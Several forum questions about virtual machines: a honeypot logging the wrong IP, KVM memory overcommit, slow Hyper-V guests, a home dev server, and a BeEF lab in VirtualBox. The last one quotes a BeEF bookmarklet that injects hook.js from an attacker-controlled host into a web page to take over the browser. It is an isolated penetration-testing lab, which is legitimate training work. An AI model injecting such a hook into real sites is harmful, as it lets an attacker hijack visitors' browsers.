Honeypot logs VM’s gateway IP instead of incoming ones

There is a virtual machine ( Virtual Box) managed by OS Xubuntu and a kippo( ssh-trap) on this one. NAT have been adjusted in the VM’s setups with port forwarding by this way: ssh tcp 195.x.x.x 22 10.0.2.15 22 (rule’s name—protocol—current host IP—host port—virtual machine’s IP—VM’s port). The Honeypot logs all connection attempts but writes VM’s gateway IP instead of incoming ones. Can anybody explain how to troubleshoot this problem?

Cant find much documentation regarding over committing of memory for VM’s on a KVM host

Most operating systems do not use 100% of the available RAM all the time, having said that I am unable to find an approximation for this over provisioning. CPU cores is not a constraint for me,

I have a 64 GB KVM host, I would like to provision multiple 8GB machines, the machines remain under utilized for most of the time but always in running state, I would like to know the maximum acceptable number of VM’s that can be provisioned on this setup, without hitting any bottlenecks. The underlying storage is hard disk drives, with no SSD so there is little room for swap memory as it may impact performance

Sluggish Linux VM’s on Hyper-V

I am experiencing very sluggish response with Linux VM’s (Debian) running on Hyper-V on a Windows host (Server 2012 R2).

The VM’s themselves are not running at 100% CPU and the host itself is reporting very low CPU usage (10%) yet each new VM I create seems to run slower and slower.

I’d understand if the host CPU was running high, or the VM itself, but that is not the case.

It seems with each VM I create, responsiveness gets worse, which I understand points to CPU resource, but I cannot see any indicators as to that being the case.

Responsiveness of the host seems fine, no issues. Memory usage is OK, Disk I/O isn’t high… Not sure where to look.

Any pointers would be appreciated, thanks.

Home development server with vm’s

I currently have 2 servers at home and would like to use one of them for development projects and one of them for a NAS.

Now I want to be able to make vm’s on the dev server so I can have a staging environment which can be piped then to production.

I want to be able to use the same server with the vm’s to develop from (must feel like using my own laptop)

How should I achieve this?

How to set up a beef hook on another VM’s browser in a NAT Network in VirtualBox

I’m reading “Practical Web Penetration Testing”. I’m using VirtualBox to run two VMs: Windows 7 with Mutillidae and KaliLinux where I want to use Beef. Both are connected to a Nat Network 10.0.2.0/24.

As it’s said in the book, I set up the KaliLinux to have a static IP by modifying /etc/network/interfaces:

source /etc/network/interfaces.d/*  # The loopback network interface auto lo iface lo inet loopback  #Static IP Address auto eth0 iface eth0 inet static     address 10.0.2.99     netmask 255.255.255.0     network 10.0.2.0     broadcast 10.0.2.255     gateway 10.0.2.1 

My Windows VM has IP 10.0.2.4.

I’m now trying to set up beef. When I open a tab on each of these VMs browsers to http://10.0.2.99:3000/demos/basic.html I do indeed get the browsers hooked as online browsers in the beef ui panel.

But I want to have a hook on Mutillidae. There’s a button for that to copy as a bookmark to append the hook.js file for a given webpage: javascript: (function () { var url = 'http://10.0.2.99:3000/hook.js';if (typeof beef == 'undefined') { var bf = document.createElement('script'); bf.type = 'text/javascript'; bf.src = url; document.body.appendChild(bf);}})();

When I run on that on either VMs browsers – opened on http://10.0.2.4/mutillidae/index.php -, it doesn’t work. The hook.js file does get loaded, I can see it on firebug. But the browser never gets “hooked”: I can’t see it on the beef panel.

I even modified this portion of /etc/beef-xss/config.yaml:

# Reverse Proxy / NAT         # If BeEF is running behind a reverse proxy or NAT         #  set the public hostname and port here         public: "10.0.2.99"      # public hostname/IP address         #public_port: "" # experimental 

And did some research but nothing…


Some weird stuff (or is that normal?):

From Kali 10.0.2.99

ping 10.0.2.99    - OK ping 10.0.2.4     - KO --> But I can access 10.0.2.4/mutillidae/ ! ping 10.0.2.1     - OK ping 10.0.2.0  -b - KO --> shouldn't I get answers from myself and gateway at least? 

From W7 10.0.2.4

ping 10.0.2.99    - OK --> So it works in that direction but not in the other? And I can access beef's panel, demo, or hook.js ping 10.0.2.4     - OK ping 10.0.2.1     - OK ping 10.0.2.0     - KO --> Reply from 10.0.2.4: Destination host unreachable. Is this why Kali can't access W7? 

Why can’t I set up a hook in Mutillidae on Win7 VM connected to the same Nat Network as Kali VM running beef?

Thanks.


If you need more details to help me out, don’t hesitate. I’ll edit my question to help you help me.